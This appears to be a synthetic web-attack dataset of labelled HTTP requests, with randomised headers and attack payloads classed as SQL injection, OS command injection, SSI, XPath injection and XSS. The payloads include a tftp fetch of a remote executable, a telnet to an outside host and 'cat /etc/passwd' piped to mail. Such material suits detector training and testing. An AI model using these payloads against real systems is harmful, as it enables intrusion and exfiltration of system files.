Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: c05odts-reai;q=0.1, eqitnqtt-n;q=0.9, nhtunryN-iSOiL, btcA6n-oa;q=0.8, qeakii-Ialei
Cache-Control: max-stale=346
Client-ip: 92.192.226.154
Cookie: us7JDSg=' )  UN/**/ION   ALL  SEL/**/ECT 'y2ssNooe',924,302,'haauRjvin',9 FROM    eu75Woeie   WHERE     (   ''    =  ';dkorotuoodOoao=Gini aYe<;CtwsCo=Iljolw
Cookie2: $Version="553"
Date: Tue, 19 Aug 08 02:02:35 CET
ETag: W/"tn7EPi_w6_IXb2y9I1B"
Expect: 100-continue
From: tnehuje@osoicnh.gov
If-Modified-Since: Thu, 18 Jun 09 08:45:14 CET
If-Unmodified-Since: Thu, 06 Dec 07 24:35:26 GMT
If-Match: "u.sfJVK1Hxo@Ov-UNMMS"
If-None-Match: "8nj34qnX0kDO.64Wb6uW"
If-Range: Tue, 08 Sep 09 13:20:05 GMT
Max-Forwards: 635
MIME-Version: 2.3
Pragma: s9ym7k5=taoakii
Proxy-Authorization: NTLM Y2lvaW1lMUVha2Eyb3h3bnRvbWFsZTdleGR5aHIwdG92cg==
Authorization: Digest realm
Referer: /ryeG/abGh5/tPme.html
TE: gzip,gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 2.4; 0U-as; rv:2.3.4) Gecko/62486581
UA-CPU: Sparc
UA-Disp: 2042,3575,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 885x378
Via: 4.9 www.nst2Ey5O.jpeg, HTTP/3.7 www.e1i6.jpg
Transfer-Encoding: identity
Upgrade: fru/3.0, tl1ne/3.4
Warning: 200 www.ierlebee.tiff "chcalstx9prp1n0pZc" 
X-Forwarded-For: 192.153.217.188
----: ----------

nhtotiEonod=751100&lsrfSsetgs=ebtmn;&ucqaKwcHjh=679876&teghes=>a6sOo-aam&tl8p01thPrntnot=1&wdmwdmc=ff@e0&1cotr=7ddoreiqii&yrjhteitres=elbu=ma7 :o$-mFh:&tMbt=7b2Tgsaet&eJabcimrx=r7st&ahulitaeodgonn=95&vbscriptqeAformV5eC0=TavsmhwCps&ug3tzOa=e oju&Euyohnendqkn0b=rm@smd4pbczrd&s1ttOmxe0nnedg=864378

End - Id: 42757
Start - Id: 40495
class: SSI
GET /gNjmhtElniXa/ot8pyeeisnows/nm4JFAyxgN6TTPC3Xr/PicdocumentxHlexec9hl_/hWEgSKooXalWW-lw-/wQqS8mYV0LiY6/eZKzEPD/teaYon1ggurtSeehou/vtnnqanlzaes/imgG8hzhtaccesewvZ_/dopgVPHPLfnfk.gif?ishza=eAYL_W5-Uk&eRERoNaLacecp=ar%28Irascripteeval75l&hstae=%3C%21--++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&rebai=tgi&6raezzs8=Omo9object HTTP/1.0
Host: 26.116.88.36
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.243.224.10
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="148"
Date: Mon, 17 Sep 07 15:10:18 GMT
ETag: "h8t2lCbAJ.hMWV1Or"
Expect: tHds
From: aqel@uheesuh.cz
If-Modified-Since: Sun, 10 Jun 07 13:00:34 CET
If-Unmodified-Since: Wed, 20 Jan 10 09:44:46 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Sep 06 12:06:13 CET
Max-Forwards: 1
MIME-Version: 2.7
Pragma: tse=e8i9oshe
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: qiee is3OjGer=ao7snt
Range: -843411,20269-
Referer: /heeeo/e41xn/arir/hdwtn/lior.tar.gz
TE: trailers
Trailer: Warning
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 8.7; nt-tP; rv:5.4.4) Gecko/16846580
UA-CPU: x86
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: FTP/9.4 www.erT0e.shtml, HTTP/8.6 www.almY.css, HTTP/5.4 51.128.138.174
Transfer-Encoding: gzip
Upgrade: lobfh/7.3, qsoit/8.8, ftt/2.1, 6ufl/5.0, fl9/6.5
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 61.112.5.136
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40495
Start - Id: 39384
class: SSI
GET /sbszcdBm8QhnzyGauE0c/2ECUhi3GGMyU8@@hm/t_GfbJC_C-9Yvgk/uaHD9QWfuPi.6/iedootfu/t5EZZK.iGm8tO/rX1dEbz3Plbc54/1rfKbx8yXpO.shtml?yOEdvAJcat=l+KepeeiHahgx%29&seCiNtbemlpo=4&etmijieeT22=ah-&hooiSEGEnre=r%40ostb1IbYnimp&vhhnrdo09ag9r7=%3C%21--%23email+fromhost%3D%22www.aswloo.com%22+tohost%3D%22mailbox.jse.com%22+message%3D%22atTie+7wlsvt+Tt39y+iyI%22+fromaddress%3D%22tmypdi.com%22+toaddress%3D%22odco.h1gqee.com%22+subject%3D%221%22+sender%3D%22uNbs.com%22+replyto%3D%22rizhdh.com%22+cc%3D%22rfwp%22+inreplyto%3D%22ma+htw+deaci3%22+id%3D%22mypmail%22+--%3E&7g=7&hgaesl=xoxsoivw0rtagae&l9sTetIesesisqe=68422091&tetgT=306623&amhrEng=756754&nHnmsntsussa=e4avNnes%3Dtrlid&gositmaetuseeoo=15 HTTP/1.0
Host: 37.152.207.131
Connection: close
Accept: video/*;q=0.6, image/*;q=0.3
Accept-Charset: windows-1250, big5
Accept-Encoding: identity, gzip;q=0.9, gzip
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 242.172.212.87
Cookie: ThoydzEne59R=0774;alauccrrboaes=dUc;hi=+HRl;siLwprEsrhno5f=449;PrUF=ioc1
Cookie2: $Version="734"
Date: Sun, 11 Jul 04 05:46:52 UTC
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: 100-continue
From: lece@srdgy.org
If-Modified-Since: Wed, 27 Sep 06 10:07:28 UTC
If-Unmodified-Since: Fri, 15 Apr 05 19:40:18 CET
If-Match: "eG3E@nsn1yEyHK6r8KHc"
If-None-Match: "Ywl2nk3GWx5g8osfI_U"
If-Range: Fri, 23 Apr 10 14:35:24 GMT
Max-Forwards: 7158
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: uriec enihpu=eed4it
Authorization: NTLM bGVhcmlubmhjb0FGclNkc3VlZXRlZG10Y05zM3Rsd2VOdDVybQ==
Range: -7403,569103-
Referer: http://edban3et.de/latdotu.bin
TE: gzip,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (compatible; MSIE 9.8; Linux i386; egumBt7n; oijristnzm; omhiaUhg)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 757x2155
Via: 1.1 www.ptdOm.gif
Transfer-Encoding: compress
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39384
Start - Id: 43424
class: OsCommanding
GET /tIYjVj/cdju/Ejott/nMJ.shtml?yoaosinee=tftp+++++-c+get+++++201.208.113.91%3A%2Flite%2Fnito.exe%7C&sjneuts5eTonose=6105&m6s=replacecj+ec+5bjexerinnt+h HTTP/1.0
Host: www.hcn2hvg.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=04
Client-ip: 44.129.23.74
Cookie: homeNl.JOoD=3h 2T;eihiweassesno4=1rawin;alte3c=6869;7gozavhq=33307;PhoEbahaeteUe=nnanunioncmd taeen0t
Cookie2: $Version="368"
Date: Sun, 16 Apr 06 15:01:55 GMT
ETag: "yZTBBii7kEZ7NsXh"
Expect: oteD40
From: eM8p@ehnasbf.it
If-Modified-Since: Thu, 09 Aug 07 12:26:12 CET
If-Unmodified-Since: Sat, 12 Jul 08 06:27:40 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Feb 04 14:42:32 GMT
Max-Forwards: 8
MIME-Version: 7.3
Pragma: Eslnri=eed9
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: Digest nonce
Range: 5130-,89497-47998,93-50140
Referer: /o2i9k05h/dvhismde/btdee7/tiet/orahhyte.gif
TE: chunked;q=0.2
Trailer: If-Range
User-Agent: 3Mk2Iak http://www.crs9hr.be
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: FTP/3.5 www.n7ifrdrr.js
Transfer-Encoding: gzip
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43424
Start - Id: 42996
class: OsCommanding
GET /ve6@G3N/dahektmtaberqno/Fii52xfF/.2Eq.Ko2/wpDXmla.gif?sriwElt0asj5=9259825802&ebtbBuiaseax3a=07859034&@cX6=jxih&set8lpFanrgl=424&ai=on%3C%3Anptu&RLA9in=ohfbin%3B&b4YTt9yTcD=1755087028 HTTP/1.0
Host: 44.223.56.229
Connection: close
Accept: */*
Accept-Charset: *
Accept-Language: *;q=0.9
Cookie: rvetiwanekttat=\" \;\/usr\/bin\/telnet   www.mageitseas.com  82    ;;LA-g=hh(;ticeo=d6c3o<u(bcilsit;DS7Z4psU0_Fk=65126082
If-Unmodified-Since: Sat, 08 May 04 06:26:34 UTC
Pragma: gen=1epUaM5
Range: 808337-7795,172872-,479-3753
Referer: /nmxy/alnb/dat3hsTe/ttsc/yeeehhuI.tiff
User-Agent: aFsZsey (2BQd3c; o-R5.N; iu-2BwiC; lo6X2kXw_f; ogOkZQxz)
UA-CPU: MIPS
Via: hrci/0.4 www.bxhsr.shtml:11
Transfer-Encoding: gzip

null

End - Id: 42996
Start - Id: 43259
class: OsCommanding
GET /oc6chzt/oiP39cs2gzh6Ed4fYU/3Sr1dSjDEkT/ibe0klirkutfHscnn0e5/sRF-3tTOf@-S46D/pVS0ta_c4o682d/96DScW.BHl0axftpHA/omoitleeaustdeiwcy5/aer3rtrqwthoaElps/tE@Swi.qxwGews/n9.jpg?rhgal1i=575135288&in=lcgoe&6etluU=sta%3C%3EsHC+ar%28httpstsY9objectc%24&mei=1nfw&ToNwera=rgQb&jvans=NIavtjieDcnn&havxfwn6lji=kEftCn&qh=aohanpi&qtippbdluxhry=w8nlzINzd&ye1hla=38837600&pS2epE6eE88e=oops++++%3B++cat++%2Fetc%2Fpasswd++++%7C+mail+++your%40tads.com&flcsbmfet=99&aestthfde1v=dEetrycqoflux&xWUWtY2=898848 HTTP/1.1
Host: www.mlteipr.org:80
Connection: drhpint
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=41424
Client-ip: 159.80.63.170
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="54"
Date: Sat, 18 Feb 06 02:40:07 CET
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Mon, 10 Mar 08 07:06:19 UTC
If-Unmodified-Since: Fri, 30 Mar 07 08:17:39 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 08:08:24 UTC
Max-Forwards: 822
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: NTLM aWdlaUlid25PcGhlemNoZ2Vyd3RuU3dnOWhwc3UyU2lpcg==
Range: -640387
Referer: http://nnnpo.it/dnilatau/aroiaSe/Eeilel.zip
TE: gzip,chunked,trailers
Trailer: If-Range
User-Agent: ttKlPJ http://www.Ti82i.fr
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 6.5 79.227.7.148, 7.9 www.y7ahkol.htm
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43259
Start - Id: 42395
class: SqlInjection
GET /g4q/oc39ev@3bzVdsfvc/uemu/0QabssI6QWG/vh73vHX@EqCqx0l/rgtz/hr9rdnb8pgmhii4t/OetletE/apgC1D8jUWlQo.gif?ntSenk1rn=ueo&oTpell=iCayojCSrw0&iimarj5=%3Bj%29regroup+bynsesisnpbHwhttp&Oj1=+eIcia&ncclike5VBV6cv3=OR+%27natotecaoa%27++++%3D+%27+%27&arIi=7756179&dn=oChghSBP1vL5&fnAr2em2a1dysol=treeuefeo&u2n=s4e&TvAKb.=Snuacatm%3Bh HTTP/1.1
Host: www.ldagbt9h.fr:4953
Connection: keep-alive
Accept: image/*;q=0.2, application/postscript, video/mpeg;q=0.6
Accept-Charset: iso-8859-8;q=0.6
Accept-Encoding: deflate, gzip;q=0.9, identity, identity
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 194.60.3.194
Cookie: euiftezrwa=1379754;v7eGeicn=Mid3iKluIytd;poe8aHc=28;6lfeoat3iiMsZo=i ln
Cookie2: $Version="2"
Date: Tue, 05 Sep 06 24:53:29 GMT
ETag: W/"3JMJ9i3BhEbYdlSnPe"
Expect: aobdyaog
From: aespw@dgaxhlomnn.it
If-Modified-Since: Sun, 28 Jan 07 02:26:27 CET
If-Unmodified-Since: Sat, 13 Mar 04 19:23:44 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: "joLoFYDvupL9su_"
Max-Forwards: 60
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: r1dh9i e8eemggy=tumI
Range: -4,92807-997,-01613
Referer: /gteioFor/Cwelns/2sheD0/b3ptl/autssX2.exe
TE: chunked;q=0.7
Trailer: Host
User-Agent: t1YidF http://www.stiif.fr
UA-CPU: StrongARM
UA-Disp: 791,8136,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 1.7 89.22.85.237, HTTP/2.9 93.58.249.206
Transfer-Encoding: cuei
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 630 www.qHomhe.tiff "xvqr" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42395
Start - Id: 49694
class: XPathInjection
GET /esne/otcLrjyaroen5ait.sh?tk=a%3Fa&Gilradsan=ler&tn=jc+&2.5tSUV1M=Pposition&fncnwu=%7Cprr+&var7Crk7cat=%7CH3a&endsdlaaey=682482&nztauVq4=0g4a7c8%27+++or+++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i%2Bj+++%2B+++k++%2Bl+%2B+1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++%27sTuar%27++%3D%27+++aeRn%27++or&ln3=%7Chtpassq%7ERos%2F4tmpflike0&uzkl8n=ocofoia HTTP/1.0
Host: www.okalnhatR.uk
Connection: narsmch
Accept: */*;q=0.6
Accept-Charset: windows-1255;q=0.6, cp-932, x-mac-korean
Accept-Encoding: gzip;q=0.2, gzip
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 108.128.7.126
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="1"
Date: Tue, 28 Apr 09 14:12:40 UTC
ETag: W/"TepWF6.gWgxd88z"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Mon, 30 Nov 09 05:47:27 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Jun 05 04:06:52 CET
Max-Forwards: 08
MIME-Version: 8.1
Pragma: k1ehsu1=d
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: NTLM ZHpwRXJyZGF3cmFFbmh0bnRhU2xlbHNUdHQ4ZWVhZXVy
Range: -394122
Referer: /oierja/brth/ahvbNuvc/irodycma.gz
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 6.8; cd-3a; rv:6.4.2) Gecko/88089690
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: FTP/0.3 www.sQahbs.shtml, HTTP/2.6 213.53.120.152
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49694
Start - Id: 43202
class: OsCommanding
GET /nh@CsIb2O87QGPXT.exe?8in9d2orcsoa=%250a++++cat+++%250a++%2Fetc%2Fpasswd+++++%250a&lynnaceEjEHpn=m%3Ed%27bgsound&uXyYlMd6yQ=21&Zcm6lnl3aDMcs=1&esoauettwmlh5=gexEjnhhee HTTP/1.0
Host: www.pptceRs.net:80
Connection: mtzaeoya
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fgckf-v52U5eth;q=0.3, MLuvy-a, hLdhoeen-deloae4;q=0.4, sdyS-aXk;q=0.5
Cache-Control: max-age=796
Client-ip: 79.214.12.199
Cookie: xeetpptfrikma=442;ganoobosn=updateWe6lntan;C5wccatnn=oy_
Cookie2: $Version="9"
Date: Thu, 05 Aug 04 22:30:49 UTC
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: QStwrm
From: eena@eaooz.de
If-Modified-Since: Wed, 14 May 08 07:45:23 GMT
If-Unmodified-Since: Mon, 02 Mar 09 24:20:08 GMT
If-Match: "VebZXtG9cBXZ1bB-YyE@"
If-None-Match: "cA4pSYaTcJ3D8d7YyXs"
If-Range: *
Max-Forwards: 4720
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: NTLM MmJ5d2V0RTJ2bmlzbmFjcmllaWU4ZGVhdGVzQW9vc29zbnNzdHB1ZGg=
Range: 704-945122,63-330705
Referer: /q2io/nze4eT/ceus5H/5ctcgade/woeotlt.msf
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: eYmN1VWuj http://www.etsdd7.fr
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 953x846
Via: HTTP/6.1 200.202.172.26:89, 1.6 www.atx6os.html
Transfer-Encoding: gzip
Upgrade: hi11/1.2
Warning: 254 www.o7hkelz.js:8351 "etdelrar1" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43202
Start - Id: 47335
class: XSS
GET /t2WF/9RRnJips2S8sB@.hA8RQ/r8HHNqgpg74/Ltwar9bqs4tlpvit/i9.qJ./yTYLb2IyRiOl5wyNLiH/l.pwCmhODhs2/twdtcisne/ll9wn6bhenoauleand/y_ov.cfm?rbr7kPaldPlg=etO%40n3b1ds&yuy=ei&tanorenc=re5sstyleswrna&xsMGFtN=%3F&0dEmQstdinMimge_XNc=2218&htttpnt=%3Cdiv+++style++++%3D++%22++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.ra.com%2Fscript%2FEtts.asmx%5D%29%3B++%22++%3E&crqm0uhT=betweenh&yn0wooar=10h%2BflC%28%7Ct%7Crn&0snoyia=%3BsauTde+dmelvnr&yilHi=dcawe&tThaL=t%24Sienm%24+sam8&imh5PY=huIie HTTP/1.0
Host: 112.47.94.145:80
Connection: qowSfro
Accept: image/*, image/gif;q=0.2, image/png
Accept-Charset: iso-8859-9, iso-2022-kr;q=0.3, iso-8859-8-i;q=0.4
Accept-Encoding: compress, deflate
Accept-Language: bl-F3N6niew;q=0.5, unwasReq-om;q=0.9, wt8qjwE-het, a-yEhzif;q=0.8
Cache-Control: max-stale
Client-ip: 88.199.53.236
Cookie: acia3rindho=6;aarurlba7huEahF=557755;wafIlfbddo=AhaioElt;Cqrg0Dk5=3969
Cookie2: $Version="498"
Date: Sun, 05 Nov 06 13:32:35 GMT
ETag: W/"xUJkwqYmp@dQTg@fEDj-"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Tue, 27 Sep 05 01:28:04 CET
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: "4LjPEMD1PLRv7tVPonY"
If-None-Match: *
If-Range: "egfgo4bKzrZfUZq"
Max-Forwards: 564
MIME-Version: 0.7
Pragma: oh='qtjmir64'
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest realm
Range: -7,-85784
Referer: /cpeaohnt.asmx
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/8.1 (compatible; MSIE 6.2; WinNT; tgost; ooi8; ouske)
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/8.9 235.121.103.199, 6.9 155.199.116.160
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 412179
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47335
Start - Id: 42047
class: SqlInjection
GET /seraduo7/3p2u30rhjjN06.msf?1ti=%27+++%2B+++++%28++++SELECT+TOP++++1+++eRheor4++++FROM++++rlessi2u%29+++%2B+++%27&la=798944625&lun4vleis=whfo&swtAd=75195&rrrhr9rhwse=ow&sbi1=eG3-yiNW_52u&W9emgc=0pb8&WEGaZx.6Y=c8q+a%5DlEvtobject%28+ HTTP/1.1
Host: 31.2.60.195:6661
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: euc-jp, iso-8859-7;q=0.0, iso-8859-8;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: eaceqae1-dd;q=0.0, nse1dod-mdEe, ongeie-eo;q=0.0
Cache-Control: no-store
Client-ip: 238.155.89.77
Cookie: tdEDt61bn4o=85EYf.HLVsWl
Cookie2: $Version="585"
Date: Thu, 08 Apr 10 06:23:57 GMT
ETag: W/"uOk-Ks6myYKrSBH2D"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Wed, 17 Sep 08 21:58:40 GMT
If-Unmodified-Since: Mon, 24 Nov 08 08:07:36 CET
If-Match: *
If-None-Match: "YUHoO.iq_-Dgw9yy5"
If-Range: Fri, 09 Oct 09 04:11:43 GMT
Max-Forwards: 83
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dW9lNm90aGFheHNpdG9hYXd3ZXRFbm9mdDVpdXVkeWllYWVkbXg0aHpoQWw=
Range: -7
Referer: http://h1e8fq3.net/tj1qm/hiocrlAs.exe
TE: deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/6.2 (X11; U; Unix 7.7; is-3o; rv:9.5.5) Gecko/23594133
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 307x472
Via: 8.0 www.ipeLehc.htm, 0.7 25.139.239.228, FTP/5.2 www.o7Iroc.tiff
Transfer-Encoding: gzip
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 057 4.164.20.194 "h7emnE" "Wed, 08 Apr 09 16:50:52 GMT"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 001394948859071824
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42047
Start - Id: 42336
class: SqlInjection
GET /NaexchtaccesMdivF/syB1Z_-ojF_TxCQuZZk/Z@cTyi8ClTU2.css?mae6Oi4O=729&eIREioai=iQblw&qes2s=gvc+%25r&leaa=9&sf=Enter1sfhnrnmt&nphHle=h0hnowuahmeep&y2ans3t=gtjaojthtaihaThe&38csunth=13784&er9rnn1sSfe=912&1lctetim=2APdJ8cV&autoexecUYMC5_.HR=yeee&gTty=or+++0%3C%3E%28select++count%28*%29++++from++zrndpr%29&hs8ve=l_X&z_kApasswd=egkrtcomsn2&oohTnAaafrelh=ot HTTP/1.1
Host: www.sgi2men.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.2, compress;q=0.3
Accept-Language: tYu-slit7ez, ensi-ezezy;q=0.8, r-7toj7;q=0.7, k1-Nah;q=0.5
Cache-Control: only-if-cached
Client-ip: 59.166.67.8
Cookie: C.yFdivhZ=fjIA>eobject %rsdwf<Uldjw;oef=n0;aezgA5aWe=49Greplace
Cookie2: $Version="3"
Date: Tue, 13 Jan 04 15:27:51 UTC
ETag: W/"7R4TNu8EPA0e6Y-q"
Expect: caShkvcr=Stis9i
From: taa7@n9I9.uk
If-Modified-Since: Thu, 05 Feb 04 05:29:01 GMT
If-Unmodified-Since: Fri, 02 Apr 10 19:23:39 CET
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: Fri, 20 Aug 04 09:40:20 GMT
Max-Forwards: 168
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -183629,81875-7
Referer: /btuwat/gohi/0Mnre/tfwk.php
TE: gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: Mozilla/2.1 (X11; U; Open BSD i586 4.1; Si-Nw; rv:4.5.9) Gecko/66678610
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: oeF/7.9 www.EAcvnsr6.jpeg:65357
Transfer-Encoding: deflate
Upgrade: tkdit/5.2
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 43766358
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42336
Start - Id: 41554
class: SqlInjection
GET /rtt/6arvnld/zGagahLTTO2@R_wrL-i_/i2aafbt2/d1S/tgW0hhcd@.php?bsh9l=cn8crao&1ntseleheentpmi=nedvincludeh%3FizmEieaH&hbm5WyeraNsesT=7e&tkoedanaceS=ntr-4iisee7GaT&sosmMnltyaheej=1368&vn6tttLn=1&eb1nftemIii9=2e&so0ss2r0aoeo=6slsNweinsertttgx%3Ft+sincludeinsert&upnin6one=mj%3ChavingT5iperlsn&var=seid7ehbqswcnds6R&XWWTTrB=%27++%29++UNION+ALL+++++SELECT++++ci++%2C+iREh+++++%2C+++++osobWaau+FROM+ab40e+++++WHERE+ecwog8+++NOT+++IN+++++%28++++%27etooed1m5%27++%29+AND++sabene4run++NOT+IN++%28++%27r9%27++%29+AND+%27%27+%3D%27&CgJKAconnecttf=275 HTTP/1.0
Host: 145.187.220.118
Connection: close
Accept: video/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.6, gzip;q=0.6, gzip, compress;q=0.1, compress;q=0.8
Accept-Language: d9HrtRn-ttk1de, ey2a-umdetteL
Cache-Control: max-stale=152
Cookie: vsuMRdni=gLa;srrBqi=lXBnVvQpD;dwfehintmse03e=JrtelnetNa;al1jg4rhscmSc=oeroa6aeslisebmgnt;h3TuwhmIcsesmd=tao] ;bO9gbojtI=bic95zrovd?f=86
Cookie2: $Version="62"
Date: Wed, 20 Sep 06 12:08:55 GMT
Expect: vnri
From: wjdalk@Ofzi.biz
If-Modified-Since: Sat, 18 Dec 04 03:25:14 CET
If-Match: "88JkUvdYQrfs2SkPkFB"
If-None-Match: *
If-Range: Thu, 15 Apr 04 14:50:44 CET
Max-Forwards: 425
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Authorization: NTLM ckhubjBkaGM4eXRwaHNhbG1lbnR5MGVhbWVveGFFb3puZWxjOTFyb3RUb09oZGk=
Referer: http://www.nibgw.org/mrtn/eal1/teTymrq/esmitin/6nawm.pdf
TE: gzip,deflate
Trailer: Via
User-Agent: Mozilla/3.9 (compatible; MSIE 9.4; Linux i386; hbi0znn; ltbf; qhsdqy)
Via: owe9n/7.7 www.iaeatwci.htm
Transfer-Encoding: compress
